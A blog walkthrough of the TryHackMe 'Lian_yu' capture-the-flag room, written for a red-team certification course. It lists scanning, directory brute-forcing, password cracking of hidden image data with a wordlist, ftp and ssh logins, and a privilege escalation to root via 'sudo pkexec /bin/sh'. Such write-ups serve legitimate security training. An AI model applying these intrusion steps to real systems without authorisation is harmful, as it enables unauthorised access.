TryHackMe : Lian_yu walkthrough

A write up covering steps taken to solve a beginner level security challenge : lianyu room in TryHackMe platform.

This blog is written as part of task of Masters Certification in Red Team Program from HackerU.

Step 1 : Connect to TryHackMe and start target machine

  1. Connect to TryHackMe by entering command :

sudo openvpn /pathtoOVPNfile.ovpn

2. Start machine in ‘lianyu’ room — target ip address will be displayed in a minute.

Step 2 : Information gathering using Nmap and gobuster

  1. Start nmap scan of the target ip:

nmap -A -O <target ip>

nmap result

Open ports:

21 — ftp vsftpd 3.0.2

22 — ssh

80 — http apache

111 — rpcbind 2–4

2. Accessing open ports:

port 80

3. Using gobuster for directory traversal:

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

4. Navigating to found directory /island and viewing the source code:

5. Navigating further through gobuster :

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

6. Navigating to new folder found: Found information on .<foldername> hidden folder

7. Using gobuster with -x flag to find the hidden folder:

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .<dirnameFromabove>

8. Navigating to the above hidden folder and hint is found: which upon searching on google needs to be decoded with base 58

9. Now logging in with initial username found to ftp service:

Try to login with ftp with vigilante username and base 58 decoded password:

ftp <targetip>

ftp login successful

10. Transferring files found from ftp to local:

Also navigating to different folder found other user’s name: It will be useful while logging in through ssh service

11. Using Stegcrack on all transfered files to bruteforce and find password for steghide:

stegcracker <filename>.jpg /usr/share/wordlists/rockyou.txt

12. Using steghide to find the hidden files:

steghide — extract -sf <filename>.jpg

13. Unzip the files to find the password in shado file for ssh login:

14. Login with other user found through ftp login:

ssh <username>@<target ip>

ssh login successful

15. After looking around, found ‘user.txt’ file:


16. Checking for privilege escalation:

sudo -l

17. Searching through gtfobins and found below command:

sudo pkexec /bin/sh

18. Found root.txt


With these steps, I was able to answer all the questions posted in lainyu room on TryHackMe.




Software Tester

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DFSocial 1st Partner Announcement: Trinity

Creating Kubernetes (k8s) cluster by joining Google Cloud Platform (GCP) Virtual Machines


Kotlin 101

Functional Shaders: A Colorful Intro-Part5 Tinting With Sepia Tone

Automatically move UITextField and UITextView up/down when keyboard appears with ODScrollView

Building Cross-Platform Desktop Apps with Electron.NET

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Tester

More from Medium

iamjustashell’s hitme,loopme,revme — Crackme Solution + Keygen

Hack the Box | Previse

How to Install IBM Maximo Visual Inspection Edge with RHEL OS on Server x86 ?

Access personal system through RDP from anywhere via OpenVPN Cloud